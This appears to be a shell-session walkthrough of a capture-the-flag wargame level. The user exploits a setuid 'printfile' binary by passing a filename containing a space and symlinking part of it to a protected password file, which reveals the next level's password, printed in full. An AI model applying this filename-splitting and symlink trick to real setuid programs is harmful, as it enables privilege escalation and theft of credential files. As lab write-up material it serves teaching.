# output.

leviathan2@leviathan:~$ ls -al
total 28
drwxr-xr-x  2 root       root       4096 Aug 26  2019 .
drwxr-xr-x 10 root       root       4096 Aug 26  2019 ..
-rw-r--r--  1 root       root        220 May 15  2017 .bash_logout
-rw-r--r--  1 root       root       3526 May 15  2017 .bashrc
-r-sr-x---  1 leviathan3 leviathan2 7436 Aug 26  2019 printfile
-rw-r--r--  1 root       root        675 May 15  2017 .profile
leviathan2@leviathan:~$ file printfile 
printfile: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=46891a094764828605a00c0c38abfccbe4b46548, not stripped
leviathan2@leviathan:~$ ./printfile 
*** File Printer ***
Usage: ./printfile filename
leviathan2@leviathan:~$ mkdir /tmp/dusu
leviathan2@leviathan:~$ cd /tmp/dusu
leviathan2@leviathan:/tmp/dusu$ echo "yo" > test.txt 
leviathan2@leviathan:/tmp/dusu$ ~/printfile test.txt 
yo
leviathan2@leviathan:/tmp/dusu$ echo "yoooooo" > "test 2".txt
leviathan2@leviathan:/tmp/dusu$ ~/printfile "test 2".txt 
/bin/cat: test: No such file or directory
/bin/cat: 2.txt: No such file or directory
leviathan2@leviathan:/tmp/dusu$ # cat tries to read from 2 different files.
leviathan2@leviathan:/tmp/dusu$ # soooooo ...
leviathan2@leviathan:/tmp/dusu$ rm test.txt      
leviathan2@leviathan:/tmp/dusu$ ln -s /etc/leviathan_pass/leviathan3 test
leviathan2@leviathan:/tmp/dusu$ ~/printfile "test 2".txt
Ahdiemoo1j
/bin/cat: 2.txt: No such file or directory

---------------------------------------
The password for leviathan3 is Ahdiemoo1j



